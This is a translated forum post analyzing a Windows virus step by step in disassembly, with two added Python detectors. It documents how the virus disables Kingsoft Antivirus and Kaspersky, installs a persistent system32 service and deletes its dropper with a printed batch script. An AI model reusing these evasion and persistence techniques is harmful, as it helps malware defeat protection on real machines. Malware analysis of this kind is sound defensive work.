Jobs are hard to find!!!
I studied missiles and satellites, but I have no interest in them; computers are what I have dug into deeply. Sadly I have nothing to show for it so far.
I finally found an internship at an anti-virus company and have been working these past few days.
So a few days ago I downloaded a virus from the pediy BBS to analyze.
Here I will only analyze the main program; the DLL the virus drops will be analyzed when I have time. Actually I have already analyzed half of it today, but the office has closed and I am hungry. Haha, sorry!!!
///// Main program
First, skip the VC++ runtime initialization:
00402BDE E8 30F0FFFF call 00401C13
Follow this CALL to reach the real entry point:
00401C13 55 push ebp
00401C14 8BEC mov ebp, esp
00401C16 81EC E4040000 sub esp, 4E4
Keep going and you arrive here (you can step in and look; it is just a function that gets the current Windows version):
00401CEA E8 33050000 call 00402222 ; nothing interesting: gets the current Windows version
Skip it and keep going:
00401D13 50 push eax
00401D14 E8 370D0000 call <jmp.&msvcrt._mbscpy>
00401D19 83C4 40 add esp, 40
00401D1C 68 00EC4000 push 0040EC00 ; ASCII "au"
00401D21 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D27 50 push eax
00401D28 E8 290D0000 call <jmp.&msvcrt._mbscat>
00401D2D 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D33 68 F8EB4000 push 0040EBF8 ; ASCII "to.e"
00401D38 50 push eax
00401D39 E8 180D0000 call <jmp.&msvcrt._mbscat>
00401D3E 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4]
00401D44 68 F4EB4000 push 0040EBF4 ; ASCII "xe"
00401D49 50 push eax
00401D4A E8 070D0000 call <jmp.&msvcrt._mbscat>
Here the string "auto.exe" is built by concatenation. (This virus is a bit odd: many of its strings are built by concatenation. Is the author doing this to evade AV detection??? It is hardly economical code.)
Keep going (stop before the call!!! otherwise you will not be able to follow the thread function):
00401D57 50 push eax
00401D58 57 push edi
00401D59 57 push edi
00401D5A 68 A91B4000 push 00401BA9
00401D5F 57 push edi ; create a thread used to shut down 金山毒霸 (Kingsoft Antivirus)
00401D60 57 push edi
00401D61 FF15 B0C04100 call dword ptr [<&kernel32.Create>; kernel32.CreateThread
At this point, look at the stack:
0012FA1C 00000000 |pSecurity = NULL
0012FA20 00000000 |StackSize = 0
0012FA24 00401BA9 |ThreadFunction = 复件_dum.00401BA9 ////// written plainly: this is the thread function's entry address
0012FA28 00000000 |pThreadParm = NULL
0012FA2C 00000000 |CreationFlags = 0
0012FA30 0012FF08 \pThreadId = 0012FF08
What are you waiting for??!! Press CTRL+G in the disassembly window and enter this address, haha.
Arriving here, set a breakpoint:
00401BA9 53 push ebx
00401BAA 55 push ebp
00401BAB 56 push esi
Single-step with F8 in the main thread; after only a few steps execution breaks at the new thread's entry,
because in the main thread:
00401D6D 68 E8030000 push 3E8 ; 1000 ms
00401D72 FFD6 call esi ; kernel32.Sleep /// see, it goes to sleep
Now let us run the child thread:
00401BBB 53 push ebx
00401BBC 68 BC1A4000 push 00401ABC ; enumerate windows
00401BC1 FF15 24C14100 call dword ptr [<&user32.EnumWind>; USER32.EnumWindows
00401BCF 68 B0EB4000 push 0040EBB0 ; points to the string "金山毒霸"; if you doubt it, follow it in the data window
00401BD4 68 98EB4000 push 0040EB98 ; ASCII "#32770"
00401BD9 53 push ebx ; find a window of class "#32770" titled "金山毒霸"
00401BDA 53 push ebx ; note that USER32.FindWindowExA searches all windows, including child windows
00401BDB FFD6 call esi ; USER32.FindWindowExA
00401BE1 68 A8EB4000 push 0040EBA8 ; ASCII "是(&Y)"
00401BE6 68 A0EB4000 push 0040EBA0 ; ASCII "Button"
00401BEB 53 push ebx ; find all windows titled "是(&Y)" (Yes)
00401BEC 50 push eax
00401BED FFD6 call esi ; USER32.FindWindowExA
00401BF2 6A 01 push 1 ; what for??? haha, to send a button-press message of course!!!
00401BF4 68 01020000 push 201 ; WM_LBUTTONDOWN
00401BF9 55 push ebp
00401BFA FFD7 call edi ; USER32.SendMessageA
00401C0B FF15 78C04100 call dword ptr [<&kernel32.Sleep>>; kernel32.Sleep
00401C11 ^ EB A8 jmp short 00401BBB
The meaning of that whole stretch of code is this:
First: the child thread is an infinite loop that sleeps constantly (without the sleep your CPU would sit at 100%!!!).
Second: in the loop it keeps looking for a window titled "金山毒霸"; if one exists it sends a close message, then sends a message pressing "是(&Y)" (Yes), and as a result you can no longer use Kingsoft Antivirus (just this little trick, heh).
OK, that concludes the analysis of this thread. A small victory!!!
Back to the main thread (you should have set a breakpoint here earlier so as not to lose the trail):
00401DAF 53 push ebx
00401DB0 50 push eax
00401DB1 E8 F6040000 call 004022AC ///// what is this function? step in and see; it actually returns the string "AD09E3"
Arriving at:
004022AC 55 push ebp
004022AD 8BEC mov ebp, esp
004022AF 81EC 08010000 sub esp, 108
004022B5 53 push ebx
004022B6 56 push esi
004022B7 57 push edi
004022B8 E8 9FFFFFFF call 0040225C ; nothing interesting in this function
Keep going, passing through sleep after sleep and other assorted junk; by the time you are about to fall asleep yourself, you arrive at:
00402341 50 push eax ; "AD09E3"
00402342 FF75 08 push dword ptr [ebp+8]
00402345 E8 2A070000 call <jmp.&msvcrt.memcpy>
What is "AD09E3"??? It is a service the virus is about to register. How do I know??? Haha, don't tell me you are not running a virtual machine. Infect one in a VM and you will see. (Comparing before and after with regsnap makes it even easier to spot.)
00401E20 50 push eax
00401E21 E8 86040000 call 004022AC ; returns ASCII "555E9A24"; clearly 555E9A24.dll is about to be dropped
00401E91 68 04010000 push 104
00401E96 50 push eax
00401E97 6A 00 push 0 ; get its own executable's file name
00401E99 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleFileNam>; kernel32.GetModuleFileNameA
00401E9F 85C0 test eax, eax
00401EA1 75 07 jnz short 00401EAA
00401EA3 8BC7 mov eax, edi
00401EA5 E9 73010000 jmp 0040201D
00401EAA 8D85 1CFDFFFF lea eax, dword ptr [ebp-2E4] ; on success, jump here
00401EB0 50 push eax ; "auto.exe"
00401EB1 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EB7 50 push eax ; "C:\Documents and Settings\CTS.AnCui\",D7,"烂",B8,"",B4,"件 dumped.exe"
00401EB8 E8 A50B0000 call <jmp.&msvcrt.strstr> ; string match
00401EBD 59 pop ecx
00401EBE 85C0 test eax, eax
00401EC0 59 pop ecx
00401EC1 74 4D je short 00401F10
00401EC3 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4] ; if its own executable is auto.exe, run the code below
00401EC9 50 push eax
00401ECA E8 9F0B0000 call <jmp.&msvcrt.strlen>
00401ECF 83F8 02 cmp eax, 2
00401ED2 59 pop ecx
00401ED3 76 3B jbe short 00401F10
00401ED5 0FBE85 1CFCFFFF movsx eax, byte ptr [ebp-3E4]
00401EDC 50 push eax
00401EDD 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EE3 68 DCEB4000 push 0040EBDC ; %c:\
00401EE8 50 push eax
00401EE9 897D FC mov dword ptr [ebp-4], edi
00401EEC E8 590B0000 call <jmp.&msvcrt.sprintf>
00401EF1 83C4 0C add esp, 0C
00401EF4 8D85 1CFCFFFF lea eax, dword ptr [ebp-3E4]
00401EFA 57 push edi
00401EFB 6A 00 push 0
00401EFD 50 push eax
00401EFE 68 CCEB4000 push 0040EBCC ; explorer.exe
00401F03 68 C4EB4000 push 0040EBC4 ; open
00401F08 6A 00 push 0 ; this part is interesting: when you double-click a drive letter and the virus runs, it does its best to disguise itself by really opening the drive for you; you are happy, but in fact you have been fooled!!!
00401F0A FF15 14C14100 call dword ptr [<&shell32.ShellExecuteA>] ; shell32.ShellExecuteA
00401F10 E8 EBF0FFFF call 00401000 ; if the executable is not auto.exe, jump here
Pause here for a moment:
00401F10 E8 EBF0FFFF call 00401000
Step in; after N calls to <jmp.&msvcrt.sprintf>,
0040125A 8D85 28FFFFFF lea eax, dword ptr [ebp-D8]
00401260 56 push esi
00401261 50 push eax
00401262 E8 E3170000 call <jmp.&msvcrt.sprintf>
finally:
00401267 68 10EB4000 push 0040EB10 ; ASCII "avp.exe"
0040126C E8 1A130000 call 0040258B
See "avp.exe"? Excited!? The real battlefield is near. What??? You feel nothing??? Don't tell me you don't know what avp.exe is??? Then you are a newbie.
Step into the call and arrive at:
0040258B 55 push ebp
0040258C 8BEC mov ebp, esp
0040258E 81EC 2C010000 sub esp, 12C
00402594 53 push ebx
00402595 56 push esi
00402596 57 push edi
00402597 33DB xor ebx, ebx
00402599 E8 84FCFFFF call 00402222 ; nothing interesting in this call
What follows enumerates processes through three API functions (to see whether AVP.EXE is among them). Here is how:
004025AE E8 95060000 call <jmp.&kernel32.CreateToolhelp32Snapshot>
004025BD E8 80060000 call <jmp.&kernel32.Process32First>
00402614 E8 23060000 call <jmp.&kernel32.Process32Next>
0040261E FF15 88C04100 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
The flow is exactly as described in 罗老大's 《Windows环境下32位汇编语言程序设计》 (32-bit Assembly Language Programming under Windows)! Haha~~
Afterwards it returns. Let's see how an existing "avp.exe" is handled:
0040127E 8D45 F0 lea eax, dword ptr [ebp-10]
00401281 50 push eax
00401282 FF15 80C04100 call dword ptr [<&kernel32.GetSystemTime>] ; kernel32.GetSystemTime
00401288 66:817D F0 D507 cmp word ptr [ebp-10], 7D5 ; SYSTEMTIME.wYear > 2005 (0x7D5)?
0040128E 76 10 jbe short 004012A0
00401290 8D45 F0 lea eax, dword ptr [ebp-10]
00401293 66:C745 F0 D507 mov word ptr [ebp-10], 7D5 ; force wYear = 2005
00401299 50 push eax
0040129A FF15 7CC04100 call dword ptr [<&kernel32.SetSystemTime>] ; kernel32.SetSystemTime
004012A0 68 204E0000 push 4E20 ; 20000 ms
004012A5 FF15 78C04100 call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep //// this sleep is damn long; pardon the language, but the virus author sure uses a damn lot of sleeps!!
004012AB 6A 01 push 1
004012AD 58 pop eax
004012AE C9 leave
004012AF C3 retn
This again exploits a flaw in Kaspersky's licensing mechanism. How? Simple: suppose your Kaspersky license runs from January 2007 to June 2009; the virus sets the system time to before January 2007 or after June 2009, and Kaspersky's real-time protection is DISABLED. Who knows whether Kaspersky will fix this flaw.
Continue running:
00401F3B 53 push ebx
00401F3C 50 push eax
00401F3D FF15 A0C04100 call dword ptr [<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
At this point the stack contains:
0012FA2C 0012FA40 |String1 = 0012FA40
0012FA30 0040E310 \String2 = "3FD1E80C.EXE"
The virus starts copying itself.
Continue:
00401F49 57 push edi
00401F4A 50 push eax ; ASCII "3FD1E80C.EXE"
00401F4B E8 20010000 call 00402070
Step in and see how the virus clones itself:
004020AC 57 push edi
004020AD 50 push eax
004020AE FF15 A4C04100 call dword ptr [<&kernel32.GetSystemDirectoryA>] ; kernel32.GetSystemDirectoryA
Look up the system directory; this is of course necessary.
004020FC 57 push edi
004020FD 50 push eax
004020FE 6A 00 push 0
00402100 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleF>; kernel32.GetModuleFileNameA
00402106 85C0 test eax, eax
00402108 ^ 74 AE je short 004020B8
0040210A 8B35 34C14100 mov esi, dword ptr [<&user32.CharUpp>; USER32.CharUpperA
00402110 8D85 F8FEFFFF lea eax, dword ptr [ebp-108]
00402116 50 push eax
00402117 FFD6 call esi
00402119 50 push eax
0040211A 8D85 F0FDFFFF lea eax, dword ptr [ebp-210]
00402120 50 push eax ; "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE"
00402121 FFD6 call esi
00402123 50 push eax ; "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\",D7,"烂",B8,"",B4,"件 DUMPED.EXE"
00402124 E8 39090000 call <jmp.&msvcrt.strstr> ; match the file name
00402129 59 pop ecx
0040212A 85C0 test eax, eax
0040212C 59 pop ecx
0040212D 74 04 je short 00402133
0040212F 33C0 xor eax, eax
00402131 EB 1A jmp short 0040214D ; if the current file is "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE", jump away
00402133 8D85 F8FEFFFF lea eax, dword ptr [ebp-108] ; if the current file is not "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE", execution continues here
00402139 50 push eax
0040213A 8D85 F0FDFFFF lea eax, dword ptr [ebp-210]
00402140 50 push eax ; ASCII "C:\WINDOWS\SYSTEM32\3FD1E80C.EXE"
00402141 E8 DEFEFFFF call 00402024 ; copy itself to %SYSTEM32%\3FD1E80C.EXE, the cloning part
00402146 F7D8 neg eax
The clone; step in:
00402024 55 push ebp
00402025 8BEC mov ebp, esp
00402027 83EC 20 sub esp, 20
0040202A 6A 1E push 1E ; sizeof(SHFILEOPSTRUCTA) = 0x1E
0040202C 8D45 E0 lea eax, dword ptr [ebp-20] ; SHFILEOPSTRUCTA lives at [ebp-20]
0040202F 6A 00 push 0
00402031 50 push eax
00402032 E8 310A0000 call <jmp.&msvcrt.memset> ; zero the structure
00402037 8B45 08 mov eax, dword ptr [ebp+8]
0040203A 8365 F6 00 and dword ptr [ebp-A], 0 ; hNameMappings = NULL
0040203E 8365 E0 00 and dword ptr [ebp-20], 0 ; hwnd = NULL
00402042 8365 FA 00 and dword ptr [ebp-6], 0 ; lpszProgressTitle = NULL
00402046 8945 E8 mov dword ptr [ebp-18], eax ; pFrom = arg1 (source)
00402049 8B45 0C mov eax, dword ptr [ebp+C]
0040204C 83C4 0C add esp, 0C
0040204F 8945 EC mov dword ptr [ebp-14], eax ; pTo = arg2 (destination)
00402052 8D45 E0 lea eax, dword ptr [ebp-20]
00402055 66:C745 F0 1000 mov word ptr [ebp-10], 10 ; fFlags = FOF_NOCONFIRMATION
0040205B 50 push eax
0040205C C745 E4 0200000>mov dword ptr [ebp-1C], 2 ; wFunc = FO_COPY
00402063 FF15 10C14100 call dword ptr [<&shell32.SHFileOperation>] ; shell32.SHFileOperationA
00402069 F7D8 neg eax
0040206B 1BC0 sbb eax, eax
0040206D 40 inc eax ; eax = (result == 0) ? 1 : 0, i.e. TRUE on success
0040206E C9 leave
0040206F C3 retn
The key is what the SHFileOperation API means!!! For the details, check the manual!!! But here I guess it is a process of copying itself to %SYSTEM32%\3FD1E80C.EXE.
If you don't believe it, look at the stack:
0012F7D8 0012F7DC
0012F7DC 00000000
Dump memory at 0012F7DC:
0012F7DC 00 00 00 00 02 00 00 00 14 F8 12 00 1C F9 12 00 .......?.?.
Two addresses, 0012f814 and 0012f91c.
Take a look:
0012F814 43 3A 5C 44 4F 43 55 4D 45 4E 54 53 20 41 4>C:\DOCUMENTS AND
0012F824 20 53 45 54 54 49 4E 47 53 5C 43 54 53 2E 4> SETTINGS\CTS.AN
0012F834 43 55 49 5C D7 C0 C3 E6 5C B8 B4 BC FE 20 4>CUI\桌面\复件 DU
0012F844 4D 50 45 44 2E 45 58 45 00 00 00 00 00 00 0>MPED.EXE........
0012F914 00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4>........C:\WINDO
0012F924 57 53 5C 53 59 53 54 45 4D 33 32 5C 33 46 4>WS\SYSTEM32\3FD1
0012F934 45 38 30 43 2E 45 58 45 00 00 00 00 00 00 0>E80C.EXE........
0012F944 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0>................
Run on until:
00401FD3 68 BCEB4000 push 0040EBBC ; -k
00401FD8 50 push eax ; "C:\WINDOWS\system32\3FD1E80C.EXE"
00401FD9 FF15 9CC04100 call dword ptr [<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401FDF 57 push edi
00401FE0 68 B80B0000 push 0BB8
00401FE5 8D85 1CFBFFFF lea eax, dword ptr [ebp-4E4]
00401FEB 68 50ED4000 push 0040ED50 ; ASCII "555E9A24"
00401FF0 50 push eax ; ASCII "C:\WINDOWS\system32\3FD1E80C.EXE -k"
00401FF1 BB 10E64000 mov ebx, 0040E610 ; ASCII "AD09E3"
00401FF6 68 10E54000 push 0040E510 ; ASCII "AD09E3"
00401FFB 53 push ebx
00401FFC E8 9B030000 call 0040239C
The virus now starts modifying the registry and adding a service:
Step in??? Of course we have to, but I am too lazy to explain it, because inside it is wall-to-wall registry and service operations. After all that, your registry gains the following:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"="C:\\WINDOWS\\system32\\3FD1E80C.EXE -k"
"DisplayName"="AD09E3"
"ObjectName"="LocalSystem"
"Description"="555E9A24"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3\Security]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3\Enum]
"0"="Root\\LEGACY_AD09E3\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
Continuing:
00402001 53 push ebx
00402002 E8 4E030000 call 00402355 ; start the service
Step in:
00402355 56 push esi
00402356 57 push edi
00402357 68 3F000F00 push 0F003F ; SC_MANAGER_ALL_ACCESS
0040235C 6A 00 push 0
0040235E 6A 00 push 0
00402360 FF15 30C04100 call dword ptr [<&advapi32.OpenSCManagerA>] ; advapi32.OpenSCManagerA
00402366 8BF8 mov edi, eax
00402368 85FF test edi, edi
0040236A 74 2D je short 00402399
0040236C 68 FF010F00 push 0F01FF ; SERVICE_ALL_ACCESS
00402371 FF7424 10 push dword ptr [esp+10]
00402375 57 push edi
00402376 FF15 20C04100 call dword ptr [<&advapi32.OpenServiceA>] ; advapi32.OpenServiceA
0040237C 8BF0 mov esi, eax
0040237E 85F6 test esi, esi
00402380 74 17 je short 00402399
00402382 6A 00 push 0
00402384 6A 00 push 0
00402386 56 push esi
00402387 FF15 1CC04100 call dword ptr [<&advapi32.StartServiceA>] ; advapi32.StartServiceA
0040238D 56 push esi
0040238E 8B35 28C04100 mov esi, dword ptr [<&advapi32.CloseServic>; advapi32.CloseServiceHandle
00402394 FFD6 call esi
00402396 57 push edi
00402397 FFD6 call esi
00402399 5F pop edi
0040239A 5E pop esi
0040239B C3 retn
All of this is easy to understand: it simply starts a service. The service is the virus running %system32%\3FD1E80C.EXE, i.e. a copy of itself. This copy drops and loads %system32%\555E9A24.DLL; how that DLL wrecks your system is a long story.
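As an added example, not code from the original post, here is a Python parser for the .reg export format shown above plus a heuristic that flags a service with this footprint (hex-looking service name and Description, auto-start ImagePath pointing at a hex-named binary in system32). The sample export is constructed to mirror the listing above with the Security blob omitted; the name patterns are assumptions tuned to this sample, not a general rule.

```python
import re

# Constructed sample mirroring the service export shown in the post (Security blob omitted).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AD09E3]
"Type"=dword:00000010
"Start"=dword:00000002
"ImagePath"="C:\\WINDOWS\\system32\\3FD1E80C.EXE -k"
"DisplayName"="AD09E3"
"Description"="555E9A24"
'''
HEXNAME = re.compile(r"^[0-9A-F]{6,8}$", re.I)   # e.g. AD09E3, 555E9A24 (assumed pattern)

def parse_reg(text):
    """Parse a .reg 5.00 export into {key: {name: value}}; hex: blobs are skipped."""
    keys, cur, cont = {}, None, False
    for line in text.splitlines():
        line = line.strip()
        if cont:                                  # inside a backslash-continued hex: value
            cont = line.endswith("\\")
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1]
            keys[cur] = {}
        elif cur is not None and line.startswith('"'):
            name, _, val = line.partition("=")
            if val.startswith("dword:"):
                keys[cur][name.strip('"')] = int(val[6:], 16)
            elif val.startswith('"'):
                keys[cur][name.strip('"')] = val[1:-1].replace("\\\\", "\\")
            else:
                cont = val.endswith("\\")
    return keys

def suspicious_services(keys):
    """Return [(service, reasons)] for Services\\<name> keys matching this sample's footprint."""
    hits = []
    for key, vals in keys.items():
        parts = key.split("\\")
        if len(parts) != 5 or parts[3].lower() != "services":
            continue                              # not a top-level service key
        name, why = parts[4], []
        if HEXNAME.match(name) and HEXNAME.match(vals.get("Description", "")):
            why.append("hex-looking service name and Description")
        image = vals.get("ImagePath", "")
        if re.search(r"\\system32\\[0-9A-F]{8}\.EXE\b", image, re.I) and vals.get("Start") == 2:
            why.append("auto-start service running a hex-named binary from system32")
        if why:
            hits.append((name, why))
    return hits
```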
Now comes deleting its own file:
00402010 E8 9BF2FFFF call 004012B0
Step in:
004012B0 55 push ebp
004012B1 8BEC mov ebp, esp
004012B3 81EC 08040000 sub esp, 408
004012B9 8D85 F8FCFFFF lea eax, dword ptr [ebp-308]
004012BF 68 FF000000 push 0FF
004012C4 50 push eax
004012C5 6A 00 push 0 ; get the current file name
004012C7 FF15 A8C04100 call dword ptr [<&kernel32.GetModuleFileNam>; kernel32.GetModuleFileNameA
004012CD 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
004012D3 68 FE000000 push 0FE
004012D8 50 push eax ; get the system directory
004012D9 FF15 A4C04100 call dword ptr [<&kernel32.GetSystemDirecto>; kernel32.GetSystemDirectoryA
0040131A 68 6CEB4000 push 0040EB6C ; ASCII "del.bat"
0040131F 50 push eax
00401320 FF15 9CC04100 call dword ptr [<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401326 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
0040132C 68 10E34000 push 0040E310 ; ASCII "3FD1E80C.EXE"
00401331 50 push eax
Keep an eye on these places with key strings.
00401378 50 push eax
00401379 50 push eax
0040137A 6A 02 push 2
0040137C 50 push eax
0040137D 50 push eax
0040137E 8D85 F8FBFFFF lea eax, dword ptr [ebp-408]
00401384 68 00000040 push 40000000
00401389 50 push eax
0040138A FF15 94C04100 call dword ptr [<&kernel32.CreateFileA>] ; kernel32.CreateFileA
At this point the stack contains:
0012F5FC 0012F624 |FileName = "C:\WINDOWS\system32\del.bat"
0012F600 40000000 |Access = GENERIC_WRITE
0012F604 00000000 |ShareMode = 0
0012F608 00000000 |pSecurity = NULL
0012F60C 00000002 |Mode = CREATE_ALWAYS
0012F610 00000000 |Attributes = 0
0012F614 00000000 \hTemplateFile = NULL
Continue: (after a great many writes to the file "C:\WINDOWS\system32\del.bat")
0040155E 6A 01 push 1
00401560 5F pop edi
00401561 FF75 FC push dword ptr [ebp-4]
00401564 FF15 88C04100 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
At this point the contents of %system32%\del.bat are:
@echo off
:selfkill
del /F /Q "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE"
if exist "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE" goto selfkill
del %0
Put simply, it deletes itself.
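As an added example (not part of the original post), a small Python checker for the self-deletion batch pattern recovered above: a label, a del of a target path, an `if exist ... goto` retry back to the label, and finally `del %0`. The regexes and the sample batch text are constructed here to mirror that del.bat.

```python
import re

# Constructed sample reproducing the del.bat the post recovered from %system32%.
SAMPLE_BAT = r'''@echo off
:selfkill
del /F /Q "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE"
if exist "C:\DOCUMENTS AND SETTINGS\CTS.ANCUI\桌面\复件 DUMPED.EXE" goto selfkill
del %0
'''
LABEL = re.compile(r"^:(\w+)$")
DEL = re.compile(r'^del\s+(?:/\w\s+)*"?([^"]+?)"?$', re.I)
RETRY = re.compile(r'^if\s+exist\s+"?([^"]+?)"?\s+goto\s+(\w+)$', re.I)

def find_selfkill_target(text):
    """Return the path a batch script deletes in a retry loop before deleting itself
    (del %0), or None. The shape is: a label, a del of the target, and an
    'if exist <target> goto <label>' below it, plus 'del %0' anywhere."""
    labels, deletes, retries, deletes_self = {}, [], [], False
    for no, raw in enumerate(text.splitlines()):
        line = raw.strip()
        if m := LABEL.match(line):
            labels[m.group(1).lower()] = no
        elif m := DEL.match(line):
            if m.group(1) == "%0":
                deletes_self = True            # the script removes itself last
            else:
                deletes.append((no, m.group(1)))
        elif m := RETRY.match(line):
            retries.append((no, m.group(1), m.group(2).lower()))
    if not deletes_self:
        return None
    for no, target, label in retries:
        # the loop: label above a del of the same target, and the retry jumps back to it
        if label in labels and any(labels[label] < d < no and t == target for d, t in deletes):
            return target
    return None
```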
Right after that, it executes this del.bat:
0040156A 8D85 F8FBFFFF lea eax, dword ptr [ebp-408]
00401570 6A 00 push 0
00401572 50 push eax
00401573 FF15 84C04100 call dword ptr [<&kernel32.WinExec>] ; kernel32.WinExec
After a series of sleeps and rets, the program ends.
This virus disables Kingsoft Antivirus and Kaspersky, registers a copy of itself as a system service, and the DLL it drops and loads even contains remote thread injection code. I did not have enough time to finish the analysis.
The author is clearly an old hand: the packer is unknown, and the code is deliberately a mess to evade detection.
http://bbs.pediy.com/attachment.php?attachmentid=11006&stc=1&d=1199705684
Thanks for reading!!!
Best wishes to all!!!
- Title: A virus a fellow member posted earlier on this board; I tried analyzing it and present it to everyone (Part 1; Part 2 is in post #15)
- Author: 安摧
- Date: 2008-01-07 19:43
- Link: http://bbs.pediy.com/showthread.php?t=57868